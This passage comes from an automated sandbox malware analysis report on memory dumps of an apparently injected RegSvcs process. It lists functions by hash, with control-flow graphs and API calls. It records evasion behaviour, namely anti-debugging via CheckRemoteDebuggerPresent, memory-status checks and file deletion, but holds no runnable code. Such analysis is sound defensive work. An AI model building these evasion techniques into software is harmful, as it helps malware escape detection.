                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4fb0d7750ffa505212ea20670126e317e53ade7c7ea38b037b649c3af61d667a
                                                                        • Instruction ID: 81ac5d973143767d1cd1dd68e6b9088e6e7a791298861b43b85d582eae47f683
                                                                        • Opcode Fuzzy Hash: 4fb0d7750ffa505212ea20670126e317e53ade7c7ea38b037b649c3af61d667a
                                                                        • Instruction Fuzzy Hash: D601F971F103249BCB549A69EC5069D7779F789714F10543DEA01E7380DB35AC058BC0
                                                                        Function 06E57E68 Relevance: .0, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6cbe7918218a86d81c45dd0fd08f24abd0509197fffedeb95feb348e6a3e1d10
                                                                        • Instruction ID: c0a16da0e87fa777ceef977e538dbb6feb53455f420520ff6a98b58e28d64bbf
                                                                        • Opcode Fuzzy Hash: 6cbe7918218a86d81c45dd0fd08f24abd0509197fffedeb95feb348e6a3e1d10
                                                                        • Instruction Fuzzy Hash: 1FF0A435A00305DFEFA4CA48E9402F97765EB40314F16646EDE09C7241EF35DD25CB90
                                                                        Function 06E56008 Relevance: .0, Instructions: 26COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ae7392d8d99a195d6a16ba222c9a5cb57ce992e27c70b683fc66efe23192802d
                                                                        • Instruction ID: 64c9b5b099d6cfad01eca1c5f59763f36b29a319c96b51ab8f7c57a1124ff02a
                                                                        • Opcode Fuzzy Hash: ae7392d8d99a195d6a16ba222c9a5cb57ce992e27c70b683fc66efe23192802d
                                                                        • Instruction Fuzzy Hash: 28E0D871E0534DABDF20CA70CD0571EBBB8DB01209F614997DD04CB191F576D9059791

                                                                        Non-executed Functions

                                                                        Function 06E50040 Relevance: 2.0, Instructions: 1969COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d38ceaad84733d6cc49a98ac3c15ff06e118c29c7edc05b4e944043846388821
                                                                        • Instruction ID: 9dc268bdd1aca5a635abff21c4e3b19fd92bcd22d07bc30027eabc18745af0f9
                                                                        • Opcode Fuzzy Hash: d38ceaad84733d6cc49a98ac3c15ff06e118c29c7edc05b4e944043846388821
                                                                        • Instruction Fuzzy Hash: B323F931D10B198ECB11EF68C8946A9F7B1FF99300F55D79AE458B7221EB70AAC4CB41
                                                                        Function 06E5E358 Relevance: .6, Instructions: 567COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 05e26235335712a2e2be700fbcd949f8320e1aff6f86aea33db25757bf3d2346
                                                                        • Instruction ID: eea91f2cae734c191366b93707c16c67c29c329164ce9278e9edce471a357923
                                                                        • Opcode Fuzzy Hash: 05e26235335712a2e2be700fbcd949f8320e1aff6f86aea33db25757bf3d2346
                                                                        • Instruction Fuzzy Hash: 3622BE30B102058FDB54DB68D484BADB7F2FF88314F259569D90ADB3A1DB35ED428B81
                                                                        Function 06E57238 Relevance: .5, Instructions: 468COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2581553985.0000000006E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_6e50000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8700fe36ece5fe0f3bac896c63faa668645d5243ebfb2ad8e88a1bc3ea7463b1
                                                                        • Instruction ID: 42547d7796bef8d4ddc7c0fc420852ff4817011ef7336e0c87c1baa0fadfc060
                                                                        • Opcode Fuzzy Hash: 8700fe36ece5fe0f3bac896c63faa668645d5243ebfb2ad8e88a1bc3ea7463b1
                                                                        • Instruction Fuzzy Hash: C1122A30E01219CFEF64DF65C854A9EB7B2BF88304F2195A9D90AAB355DB309D85CB81
                                                                        Function 01674308 Relevance: .3, Instructions: 281COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2566369542.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_1670000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d81c55d4a416eb29bcea63eeb5d1ac5669dd0f665371ca2e754e27e5cd25bb5a
                                                                        • Instruction ID: 55367c64875b2c1c566170d4da50430d8096d06a87ff3a540bdaee0bd97966fc
                                                                        • Opcode Fuzzy Hash: d81c55d4a416eb29bcea63eeb5d1ac5669dd0f665371ca2e754e27e5cd25bb5a
                                                                        • Instruction Fuzzy Hash: 97B13B71E00219CFEB14CFA9DC897ADBBF2AF88714F148129D815AB354EB749845CF91

                                                                        Execution Graph

                                                                        Execution Coverage:13.8%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:53
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 28086 de7fd8 28087 de801c CheckRemoteDebuggerPresent 28086->28087 28088 de805e 28087->28088 28089 de0848 28091 de084e 28089->28091 28090 de091b 28091->28090 28093 de1497 28091->28093 28094 de149e 28093->28094 28095 de15be 28094->28095 28102 de899c 28094->28102 28107 de89da 28094->28107 28112 de8870 28094->28112 28117 de8a39 28094->28117 28122 de886b 28094->28122 28127 de9128 28094->28127 28095->28091 28104 de89a1 28102->28104 28103 de8acb 28103->28094 28132 de8ae8 28104->28132 28136 de8ae7 28104->28136 28108 de89df 28107->28108 28110 de8ae8 DeleteFileW 28108->28110 28111 de8ae7 DeleteFileW 28108->28111 28109 de8acb 28109->28094 28110->28109 28111->28109 28114 de8889 28112->28114 28113 de8acb 28113->28094 28114->28113 28115 de8ae8 DeleteFileW 28114->28115 28116 de8ae7 DeleteFileW 28114->28116 28115->28113 28116->28113 28119 de8a3e 28117->28119 28118 de8acb 28118->28094 28120 de8ae8 DeleteFileW 28119->28120 28121 de8ae7 DeleteFileW 28119->28121 28120->28118 28121->28118 28124 de8889 28122->28124 28123 de8acb 28123->28094 28124->28123 28125 de8ae8 DeleteFileW 28124->28125 28126 de8ae7 DeleteFileW 28124->28126 28125->28123 28126->28123 28128 de9132 28127->28128 28129 de914c 28128->28129 28144 663f5c8 28128->28144 28148 663f5d8 28128->28148 28129->28094 28133 de8af8 28132->28133 28134 de8b2a 28133->28134 28140 de7aa0 28133->28140 28134->28103 28137 de8af8 28136->28137 28138 de8b2a 28137->28138 28139 de7aa0 DeleteFileW 28137->28139 28138->28103 28139->28138 28141 de8f50 DeleteFileW 28140->28141 28143 de8fcf 28141->28143 28143->28134 28146 663f5ed 28144->28146 28145 663f802 28145->28129 28146->28145 28147 663fc20 GlobalMemoryStatusEx GlobalMemoryStatusEx 28146->28147 28147->28146 28150 663f5ed 28148->28150 28149 663f802 28149->28129 28150->28149 28151 663fc20 GlobalMemoryStatusEx GlobalMemoryStatusEx 28150->28151 28151->28150

                                                                        Executed Functions

                                                                        Function 06635150 Relevance: 1.8, Strings: 1, Instructions: 599COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 519 6635150-663516d 520 663516f-6635172 519->520 521 6635174-6635175 520->521 522 663517a-663517d 520->522 521->522 523 6635194-6635197 522->523 524 663517f-663518f 522->524 525 6635285-663528e 523->525 526 663519d-66351a0 523->526 524->523 530 66352d3-66352dc 525->530 531 6635290 525->531 528 66351a2-66351bf 526->528 529 66351c4-66351c7 526->529 528->529 535 66351e3-66351e6 529->535 536 66351c9-66351de 529->536 532 6635326-6635353 530->532 533 66352de-66352e9 530->533 534 6635295-6635298 531->534 558 663535d-6635360 532->558 533->532 539 66352eb-66352fb 533->539 541 66352a2-66352a5 534->541 542 663529a-663529d 534->542 537 66351e8-66351f7 535->537 538 66351fc-66351ff 535->538 536->535 537->538 545 6635201-6635204 538->545 546 663520b-663520e 538->546 539->532 547 66352fd-6635301 539->547 548 66352a7-66352ac 541->548 549 66352af-66352b2 541->549 542->541 553 6635206 545->553 554 6635238-6635246 545->554 546->545 555 6635210-6635213 546->555 556 6635306-6635308 547->556 548->549 550 66352b4-66352bd 549->550 551 66352be-66352c1 549->551 559 66352c3-66352c7 551->559 560 66352ce-66352d1 551->560 553->546 565 663524d-6635250 554->565 561 6635226-6635229 555->561 562 6635215-663521b 555->562 563 663530a 556->563 564 663530f-6635312 556->564 566 6635362-6635369 558->566 567 6635374-6635377 558->567 568 66352c9 559->568 569 6635318-6635325 559->569 560->530 560->556 571 6635233-6635236 561->571 572 663522b-6635230 561->572 562->521 570 6635221 562->570 563->564 564->520 564->569 573 6635255-6635258 565->573 574 6635442-6635449 566->574 575 663536f 566->575 576 6635379-6635383 567->576 577 6635388-663538b 567->577 568->560 570->561 571->554 571->573 572->571 578 6635270-6635273 573->578 579 663525a-663526b 573->579 575->567 576->577 580 6635395-6635398 577->580 581 663538d-6635394 577->581 582 6635280-6635283 578->582 583 6635275-663527b 578->583 579->578 585 66353ba-66353bd 580->585 586 663539a-663539e 580->586 582->525 582->534 583->582 587 66353db-66353de 585->587 588 66353bf-66353c3 585->588 590 66353a4-66353ac 586->590 591 663544a-6635484 586->591 593 66353e0-66353f1 587->593 594 66353f6-66353f9 587->594 588->591 592 66353c9-66353d1 588->592 590->591 595 66353b2-66353b5 590->595 601 6635486-6635489 591->601 592->591 596 66353d3-66353d6 592->596 593->594 598 6635413-6635416 594->598 599 66353fb-66353ff 594->599 595->585 596->587 603 6635430-6635432 598->603 604 6635418-663541c 598->604 599->591 602 6635401-6635409 599->602 607 66354a1-66354a4 601->607 608 663548b-663549e 601->608 602->591 609 663540b-663540e 602->609 605 6635434 603->605 606 6635439-663543c 603->606 604->591 610 663541e-6635426 604->610 605->606 606->558 606->574 611 66354a6-66354b7 607->611 612 66354be-66354c1 607->612 609->598 610->591 613 6635428-663542b 610->613 623 6635507-663550e 611->623 624 66354b9 611->624 614 66354c3-66354d4 612->614 615 66354db-66354de 612->615 613->603 614->608 625 66354d6 614->625 617 66354e0-66354f1 615->617 618 66354f8-66354fb 615->618 629 66354f3 617->629 630 6635518-6635529 617->630 621 6635574-6635708 618->621 622 66354fd-6635500 618->622 668 663583e-6635851 621->668 669 663570e-6635715 621->669 622->621 627 6635502-6635505 622->627 628 6635513-6635516 623->628 624->612 625->615 627->623 627->628 628->630 632 6635530-6635533 628->632 629->618 630->623 639 663552b 630->639 633 6635541-6635544 632->633 634 6635535-663553c 632->634 637 6635546-6635557 633->637 638 663555e-6635561 633->638 634->633 637->623 645 6635559 637->645 640 6635563-6635568 638->640 641 663556b-663556e 638->641 639->632 640->641 641->621 644 6635854-6635856 641->644 646 6635858 644->646 647 663585d-6635860 644->647 645->638 646->647 647->601 649 6635866-663586f 647->649 670 663571b-663573e 669->670 671 66357c9-66357d0 669->671 680 6635746-663574e 670->680 671->668 673 66357d2-6635805 671->673 684 6635807 673->684 685 663580a-6635837 673->685 681 6635753-6635794 680->681 682 6635750 680->682 693 6635796-66357a7 681->693 694 66357ac-66357bd 681->694 682->681 684->685 685->649 685->668 693->649 694->649
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $
                                                                        • API String ID: 0-3993045852
                                                                        • Opcode ID: 23e743c720495a78ce721559b3fedac878ecec448062cf8bf7db93ff8053581e
                                                                        • Instruction ID: c141df1c88502fedca97d217c94f46c0a967d81237d1e68a819a28d9c6e68242
                                                                        • Opcode Fuzzy Hash: 23e743c720495a78ce721559b3fedac878ecec448062cf8bf7db93ff8053581e
                                                                        • Instruction Fuzzy Hash: 3322B075E002258FDF64DFA4C9806AEB7B2EF89310F24856AD406EB355DB31ED46CB90
                                                                        Function 06632348 Relevance: 1.5, Instructions: 1481COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a0c0cad7c6b671626fa909bc7796bec74f49ceee9163970611d358b47d53a57e
                                                                        • Instruction ID: dc1e8e148f67a8d99fa20fece94823dba9ffbbb1b80607d286018289b010170b
                                                                        • Opcode Fuzzy Hash: a0c0cad7c6b671626fa909bc7796bec74f49ceee9163970611d358b47d53a57e
                                                                        • Instruction Fuzzy Hash: 66D27A34E00219CFDB64DF68C494AADB7B2FF85310F5485AAD449AB365EB31ED85CB80
                                                                        Function 06636188 Relevance: .8, Instructions: 818COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e63744fbbb11758abbe91725043395ed8cd84e034afbbcfac20bf0008c4a4ef
                                                                        • Instruction ID: a8cd5b456199a34c08e9600422746c7665801aadc57ae680feab37e55ae03e01
                                                                        • Opcode Fuzzy Hash: 8e63744fbbb11758abbe91725043395ed8cd84e034afbbcfac20bf0008c4a4ef
                                                                        • Instruction Fuzzy Hash: 0262BF34B00225AFDB54DB68D594BADB7F2EF88310F248469E806DB395DB31ED46CB90
                                                                        Function 0663B1D8 Relevance: .8, Instructions: 773COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef5ae43e534a7fc9afb1f0053bf1b11b39c0ef54862c0ffbf6a345c21b53a07f
                                                                        • Instruction ID: 48394e39a675fb6c1a2cdbf10b6d80fc2ebb9e932aac76380bc17be59ff5e92e
                                                                        • Opcode Fuzzy Hash: ef5ae43e534a7fc9afb1f0053bf1b11b39c0ef54862c0ffbf6a345c21b53a07f
                                                                        • Instruction Fuzzy Hash: 7C527E34E002298FEF64DF68D8907ADB7F2EB95310F24856AE405EB395DA34DC85CB91
                                                                        Function 0663C130 Relevance: .6, Instructions: 646COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 3166 663c130-663c152 3167 663c154-663c157 3166->3167 3168 663c176-663c179 3167->3168 3169 663c159-663c171 3167->3169 3170 663c183-663c186 3168->3170 3171 663c17b-663c17e 3168->3171 3169->3168 3173 663c1a9-663c1ac 3170->3173 3174 663c188-663c1a4 3170->3174 3171->3170 3175 663c1be-663c1c1 3173->3175 3176 663c1ae-663c1b7 3173->3176 3174->3173 3178 663c1c3-663c1cc 3175->3178 3180 663c1de-663c1e1 3175->3180 3176->3178 3179 663c1b9 3176->3179 3181 663c4d2-663c505 3178->3181 3182 663c1d2-663c1d9 3178->3182 3179->3175 3180->3176 3183 663c1e3-663c1e6 3180->3183 3192 663c507-663c50a 3181->3192 3182->3180 3184 663c1f0-663c1f3 3183->3184 3185 663c1e8-663c1eb 3183->3185 3187 663c1f5-663c1f8 3184->3187 3188 663c1fd-663c200 3184->3188 3185->3184 3187->3188 3190 663c202-663c21b 3188->3190 3191 663c220-663c223 3188->3191 3190->3191 3195 663c230-663c233 3191->3195 3196 663c225-663c22b 3191->3196 3193 663c536-663c539 3192->3193 3194 663c50c-663c525 3192->3194 3197 663c53b-663c554 3193->3197 3198 663c559-663c55c 3193->3198 3222 663c52b-663c535 3194->3222 3223 663c5bf-663c5cb 3194->3223 3200 663c235-663c257 3195->3200 3201 663c25c-663c25f 3195->3201 3196->3195 3197->3198 3205 663c569-663c56c 3198->3205 3206 663c55e-663c568 3198->3206 3200->3201 3203 663c261-663c271 3201->3203 3204 663c276-663c279 3201->3204 3203->3204 3207 663c473-663c47c 3204->3207 3208 663c27f-663c282 3204->3208 3210 663c58f-663c592 3205->3210 3211 663c56e-663c58a 3205->3211 3214 663c482 3207->3214 3215 663c284-663c28d 3207->3215 3208->3215 3219 663c29c-663c29f 3208->3219 3216 663c594-663c5a2 3210->3216 3217 663c5ad-663c5af 3210->3217 3211->3210 3224 663c487-663c48a 3214->3224 3215->3181 3227 663c293-663c297 3215->3227 3216->3194 3243 663c5a8 3216->3243 3225 663c5b1 3217->3225 3226 663c5b6-663c5b9 3217->3226 3229 663c2a1-663c2c6 3219->3229 3230 663c2cb-663c2ce 3219->3230 3236 663c5d1-663c5da 3223->3236 3237 663c76b-663c775 3223->3237 3233 663c4b5-663c4b7 3224->3233 3234 663c48c-663c4b0 3224->3234 3225->3226 3226->3192 3226->3223 3227->3219 3229->3230 3231 663c2d0-663c2d4 3230->3231 3232 663c2df-663c2e2 3230->3232 3231->3171 3240 663c2da 3231->3240 3241 663c302-663c305 3232->3241 3242 663c2e4-663c2fd 3232->3242 3244 663c4b9 3233->3244 3245 663c4be-663c4c1 3233->3245 3234->3233 3246 663c5e0-663c600 3236->3246 3247 663c776-663c7ae 3236->3247 3240->3232 3251 663c307-663c320 3241->3251 3252 663c325-663c328 3241->3252 3242->3241 3243->3217 3244->3245 3245->3167 3249 663c4c7-663c4d1 3245->3249 3273 663c606-663c60f 3246->3273 3274 663c759-663c765 3246->3274 3259 663c7b0-663c7b3 3247->3259 3251->3252 3253 663c354-663c357 3252->3253 3254 663c32a-663c34f 3252->3254 3260 663c382-663c385 3253->3260 3261 663c359-663c37d 3253->3261 3254->3253 3269 663c7d6-663c7d9 3259->3269 3270 663c7b5-663c7d1 3259->3270 3264 663c387-663c38c 3260->3264 3265 663c38f-663c392 3260->3265 3261->3260 3264->3265 3271 663c3a4-663c3a7 3265->3271 3272 663c394-663c39f 3265->3272 3275 663c993-663c995 3269->3275 3276 663c7df-663c7ed 3269->3276 3270->3269 3282 663c3c3-663c3c6 3271->3282 3283 663c3a9-663c3b8 3271->3283 3272->3271 3273->3247 3281 663c615-663c644 call 6636138 3273->3281 3274->3236 3274->3237 3284 663c997 3275->3284 3285 663c99c-663c99f 3275->3285 3287 663c7f4-663c7f6 3276->3287 3316 663c686-663c69c 3281->3316 3317 663c646-663c67e 3281->3317 3288 663c3c8-663c3d9 3282->3288 3289 663c3de-663c3e1 3282->3289 3283->3185 3303 663c3be 3283->3303 3284->3285 3285->3259 3291 663c9a5-663c9ae 3285->3291 3296 663c7f8-663c7fb 3287->3296 3297 663c80d-663c837 3287->3297 3288->3289 3298 663c3e3-663c3e8 3289->3298 3299 663c3eb-663c3ee 3289->3299 3296->3291 3313 663c988-663c992 3297->3313 3314 663c83d-663c846 3297->3314 3298->3299 3300 663c3f0-663c459 3299->3300 3301 663c45e-663c461 3299->3301 3300->3301 3307 663c463-663c469 3301->3307 3308 663c46e-663c471 3301->3308 3303->3282 3307->3308 3308->3207 3308->3224 3318 663c961-663c986 3314->3318 3319 663c84c-663c959 call 6636138 3314->3319 3324 663c6ba-663c6d0 3316->3324 3325 663c69e-663c6b2 3316->3325 3317->3316 3318->3291 3319->3314 3373 663c95f 3319->3373 3335 663c6d2-663c6e6 3324->3335 3336 663c6ee-663c701 3324->3336 3325->3324 3335->3336 3342 663c703-663c70d 3336->3342 3343 663c70f 3336->3343 3346 663c714-663c716 3342->3346 3343->3346 3348 663c747-663c753 3346->3348 3349 663c718-663c71d 3346->3349 3348->3273 3348->3274 3351 663c72b 3349->3351 3352 663c71f-663c729 3349->3352 3354 663c730-663c732 3351->3354 3352->3354 3354->3348 3355 663c734-663c740 3354->3355 3355->3348 3373->3313
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 216cd99a2148dfa1d39acaab1c48ef8915df70c4263feb035c2ef0d2eb6d7861
                                                                        • Instruction ID: 0e5a37a91e90e457b0adba91c178d7dd9dd1794815b9a0d27d46335e60f9a7a7
                                                                        • Opcode Fuzzy Hash: 216cd99a2148dfa1d39acaab1c48ef8915df70c4263feb035c2ef0d2eb6d7861
                                                                        • Instruction Fuzzy Hash: AB329134B002199FEF54DB68D884BAEB7B2FB88310F108569E515EB395DB75EC42CB90
                                                                        Function 06637918 Relevance: .5, Instructions: 476COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3383508050.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_6630000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5400d8842c9da09c2b399f42f40ad99fb893e6a6400defed66588f27258ce5d8
                                                                        • Instruction ID: 170f5f49fcb85af72c77516fc07f64be4d55815ff5655b2d212246f5cf66fe10
                                                                        • Opcode Fuzzy Hash: 5400d8842c9da09c2b399f42f40ad99fb893e6a6400defed66588f27258ce5d8
                                                                        • Instruction Fuzzy Hash: FE029F74B0021A8FDB54DF78D894AAEBBF2EF84310F248569D4069B395DB31ED42CB94
                                                                        Function 00DEF79D Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 697 def79d-def7b9 700 def7bf-def84c GlobalMemoryStatusEx 697->700 701 def7bb-def7be 697->701 704 def84e-def854 700->704 705 def855-def87d 700->705 704->705
                                                                        APIs
                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00DEF83F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: GlobalMemoryStatus
                                                                        • String ID:
                                                                        • API String ID: 1890195054-0
                                                                        • Opcode ID: bb559aac3a38d4dc2bf59ba350764ca85bdc71a675560fd50556e83127a235a5
                                                                        • Instruction ID: 8f476a1d9ee1542aeb4d6fea448939b58d5b37d50268219bb4a855fb728c0f99
                                                                        • Opcode Fuzzy Hash: bb559aac3a38d4dc2bf59ba350764ca85bdc71a675560fd50556e83127a235a5
                                                                        • Instruction Fuzzy Hash: 3121A7B1C0025A9FDB10DFAAC4447EEBBF4EF48320F14852AD948A7340D338A841CFA1
                                                                        Function 00DE7FD8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 708 de7fd8-de805c CheckRemoteDebuggerPresent 710 de805e-de8064 708->710 711 de8065-de80a0 708->711 710->711
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00DE804F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: dfc98dedfc34b641c684c045ff6c0a437ec9b55fdd11058d73bd4a7e6370f1c4
                                                                        • Instruction ID: 83eeed89c7e17bac9e35775b6664345f6d113ce157b51af9fed1a94380610568
                                                                        • Opcode Fuzzy Hash: dfc98dedfc34b641c684c045ff6c0a437ec9b55fdd11058d73bd4a7e6370f1c4
                                                                        • Instruction Fuzzy Hash: 0A2157B1800259CFDB10CF9AC884BEEFBF4AF48320F14841AE859A3350D778A944CF60
                                                                        Function 00DE7FD7 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 714 de7fd7-de805c CheckRemoteDebuggerPresent 716 de805e-de8064 714->716 717 de8065-de80a0 714->717 716->717
                                                                        APIs
                                                                        • CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 00DE804F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: CheckDebuggerPresentRemote
                                                                        • String ID:
                                                                        • API String ID: 3662101638-0
                                                                        • Opcode ID: f9aac19b71c00e7a34be6f7099e129e3c34f583b4debdf809e0ba3154ee1f32d
                                                                        • Instruction ID: 01535f1e721235e447802ad9c1e13da4e158e8c748b49bd59133dda90a1480e9
                                                                        • Opcode Fuzzy Hash: f9aac19b71c00e7a34be6f7099e129e3c34f583b4debdf809e0ba3154ee1f32d
                                                                        • Instruction Fuzzy Hash: D62137B2800259CFDB10CF9AD5847EEBBF4AF48310F14845AE459B7351D778A944DF60
                                                                        Function 00DE7AA0 Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 720 de7aa0-de8f9a 723 de8f9c-de8f9f 720->723 724 de8fa2-de8fcd DeleteFileW 720->724 723->724 725 de8fcf-de8fd5 724->725 726 de8fd6-de8ffe 724->726 725->726
                                                                        APIs
                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00DE8FC0
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.3369115971.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_de0000_RegSvcs.jbxd
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 3d42b06ffe85b6640484dd4e803ac53c5fc9ef42c7686845ffc121c17b09b7e2
                                                                        • Instruction ID: c20c7a5a3012257eb2663d95c04cec84fbc5056dd06cfc03760599cfdefaecb2
                                                                        • Opcode Fuzzy Hash: 3d42b06ffe85b6640484dd4e803ac53c5fc9ef42c7686845ffc121c17b09b7e2
                                                                        • Instruction Fuzzy Hash: BA2133B1C0465A9BDB10DF9AC4447AEFBB4EF88320F14816AE918B7240D738A940CFA4
                                                                        Function 00DE8F4F Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
